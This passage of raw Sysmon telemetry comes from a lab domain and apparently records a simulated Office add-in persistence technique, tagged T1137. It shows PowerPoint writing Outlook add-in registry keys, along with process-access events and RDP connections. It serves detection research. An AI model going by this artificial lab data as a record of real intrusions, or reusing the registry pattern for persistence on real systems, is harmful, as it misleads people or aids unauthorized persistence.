Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\ColleagueImport.ColleagueImportAddin\LoadBehaviorDWORD (0x00000003) 13241300x800000000000000080513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:41.982{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\ColleagueImport.ColleagueImportAddin\CommandLineSafeDWORD (0x00000000) 13241300x800000000000000080512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:41.982{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\ColleagueImport.ColleagueImportAddin\FriendlyNameMicrosoft SharePoint Server Colleague Import Add-in 13241300x800000000000000080511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1137SetValue2021-04-20 14:58:41.982{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\Outlook\Addins\ColleagueImport.ColleagueImportAddin\DescriptionThe Add-in allows Microsoft SharePoint Server to import colleague suggestions based on your Outlook content 23542300x800000000000000050577Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:42.923{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=869BB9324394E9240295C0A54DCC4407,SHA256=42F9A85D4DF3B4D82111F03FC577FE4D35FE7EA833751ED058CEDC2E4E309A42,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050576Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:39.778{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-61676-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000050575Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:42.187{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A0A9B8EB3B63BCB7E38B5030E2648447,SHA256=0D56E75A38F6703DF081E5FAA335DF25F8ECF57942F23A1117A55DC15F973ACB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080608Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.857{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC23-607E-AC0E-00000000BB01}6316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080607Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.857{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC23-607E-AC0E-00000000BB01}6316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080606Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.857{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC23-607E-AC0E-00000000BB01}6316C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080605Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.841{A7A01FEF-B626-607E-1600-00000000BB01}15401316C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-470E-00000000BB01}2240C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+8d212|C:\Windows\system32\wbem\wmiprvsd.dll+8dfd1|C:\Windows\system32\wbem\wmiprvsd.dll+3b42f|C:\Windows\system32\wbem\wmiprvsd.dll+d4be|C:\Windows\system32\wbem\wbemcore.dll+2af4f|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000080604Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:43.825{A7A01FEF-EC20-607E-9B0E-00000000BB01}5496C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXEHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\CurrentSkuIdAggregationForApp\Publisher{3AD61E22-E4FE-497F-BDB1-3E51BD872173} 11241100x800000000000000080603Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:43.825{A7A01FEF-EC23-607E-AB0E-00000000BB01}4436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1154-0\Microsoft.VisualStudio.Tools.Office.Runtime.Internal.dll2021-04-20 14:58:43.825 10341000x800000000000000080602Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.732{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC23-607E-AB0E-00000000BB01}4436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080601Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.716{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC23-607E-AB0E-00000000BB01}4436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080600Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.716{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC23-607E-AB0E-00000000BB01}4436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080599Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.685{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC23-607E-AA0E-00000000BB01}6984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080598Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.685{A7A01FEF-EC23-607E-A70E-00000000BB01}9446656C:\Windows\system32\sppsvc.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+7ec28|C:\Windows\system32\sppsvc.exe+749f0|C:\Windows\system32\sppsvc.exe+95a0e|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4 10341000x800000000000000080597Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.685{A7A01FEF-EC23-607E-A70E-00000000BB01}9446656C:\Windows\system32\sppsvc.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\KERNELBASE.dll+221bd|C:\Windows\system32\sppsvc.exe+8d889|C:\Windows\system32\sppsvc.exe+74b0a|C:\Windows\system32\sppsvc.exe+959c1|C:\Windows\system32\sppsvc.exe+54717|C:\Windows\system32\sppsvc.exe+a1ebb|C:\Windows\system32\sppsvc.exe+b429a|C:\Windows\system32\sppsvc.exe+b458f|C:\Windows\system32\RPCRT4.dll+7a593|C:\Windows\system32\RPCRT4.dll+d9f41|C:\Windows\system32\RPCRT4.dll+62d4c|C:\Windows\system32\RPCRT4.dll+4a274|C:\Windows\system32\RPCRT4.dll+4918d|C:\Windows\system32\RPCRT4.dll+49a3b|C:\Windows\system32\RPCRT4.dll+310ac|C:\Windows\system32\RPCRT4.dll+3152c|C:\Windows\system32\RPCRT4.dll+1ae1c|C:\Windows\system32\RPCRT4.dll+1c67b|C:\Windows\system32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\SYSTEM32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080596Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.669{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC23-607E-AA0E-00000000BB01}6984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080595Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.669{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC23-607E-AA0E-00000000BB01}6984C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000080594Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localDLL2021-04-20 14:58:43.622{A7A01FEF-EC23-607E-A90E-00000000BB01}6184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\1828-0\Microsoft.VisualStudio.Tools.Office.Runtime.dll2021-04-20 14:58:43.622 354300x800000000000000080593Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.409{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57582-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local49666- 354300x800000000000000080592Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.409{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57582-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local49666- 354300x800000000000000080591Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.408{A7A01FEF-B626-607E-0D00-00000000BB01}1008C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57581-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 354300x800000000000000080590Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.408{A7A01FEF-B624-607E-0B00-00000000BB01}860C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local57581-truefe80:0:0:0:1082:b69b:30c5:c700win-dc-339.attackrange.local135epmap 354300x800000000000000080589Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.132{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-36283-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000080588Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:42.027{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-39006-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000080587Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.357{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=3D933DBBA0EC66B2B5C93B3C98C14DAA,SHA256=81D7412A0682FD240B9F8FB320E7D63B7ACFA075C3192D5DA203332DE5A11927,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080586Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.357{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=91EF0E788893BD453A694E76CC22C0DF,SHA256=B3972EA8648A766DC29DCAE41FA828B27E352400DDAB446A5E52491FDE4EB66E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000080585Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.357{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B1A7D82AEE734FE72ED15133A18DD5DF,SHA256=732FDD6A037060C2CC9C6EA56B4B5C29032287B56DEFBDC21AC97E919B871D74,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080584Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.278{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC23-607E-A90E-00000000BB01}6184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080583Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.263{A7A01FEF-EC20-607E-9B0E-00000000BB01}54964312C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE{A7A01FEF-C0A6-607E-7605-00000000BB01}4400C:\Windows\System32\rdpclip.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdce3|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdc83|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bdbf6|C:\Program Files\Common Files\Microsoft Shared\Office16\mso.dll+bd59d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+2f4b95|C:\Program Files\Microsoft Office\root\Office16\ppcore.dll+8850|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE+1c8d|C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE+1b66|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080582Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.247{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC23-607E-A90E-00000000BB01}6184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080581Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.247{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71204028C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC23-607E-A90E-00000000BB01}6184C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b591|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+b518|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9e05|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080580Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:43.185{A7A01FEF-B624-607E-0A00-00000000BB01}8524336C:\Windows\system32\services.exe{A7A01FEF-EC23-607E-A70E-00000000BB01}944C:\Windows\system32\sppsvc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080579Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 